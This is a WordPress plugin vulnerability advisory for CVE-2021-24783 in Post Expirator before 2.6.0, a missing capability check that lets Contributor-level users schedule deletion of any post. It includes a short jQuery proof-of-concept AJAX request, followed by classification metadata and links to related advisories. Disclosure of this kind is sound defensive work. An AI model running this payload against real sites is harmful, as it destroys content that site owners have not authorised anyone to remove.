Post Expirator < 2.6.0 – Contributor+ Arbitrary Post Schedule Deletion | CVE 2021-24783 | Plugin Vulnerabilities

Description

The plugin does not have proper capability checks in place, which could allow users with a role as low as Contributor to schedule deletion of arbitrary posts.

Proof of Concept

Run on "Posts" page:

jQuery.post(ajaxurl,{
nonce: config.ajax.nonce,
action:"manage_wp_posts_using_bulk_quick_save_bulk_edit",
post_ids:[783],
expirationdate_status:"change-add",
/* UTC timestamp */
expirationdate_month:9,
expirationdate_day:22,
expirationdate_year:2021,
expirationdate_hour:20,
expirationdate_minute:55,
expirationdate_expiretype:"delete"
})

Affects Plugins

Fixed in 2.6.0

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

de51b970-ab13-41a6-a479-a92cd0e70b71

Timeline

Publicly Published

2021-10-11 (about 4 years ago)

Added

2021-10-11 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-05-21

Title

AI ChatBot < 5.3.6 - Missing Authorization via openai_file_upload_callback

Published

2022-05-18

Title

Jupiter < 6.10.2 - Subscriber+ Arbitrary Plugin Deletion

Published

2024-03-19

Title

Coming Soon & Maintenance Mode by Colorlib <= 1.0.99 - Information Exposure

Published

2022-03-29

Title

Flo Launch < 2.4.1 - Missing Authentication Allow Full Site Takeover

Published

2021-03-24

Title

All Thrive Themes and Plugins - Unauthenticated Option Update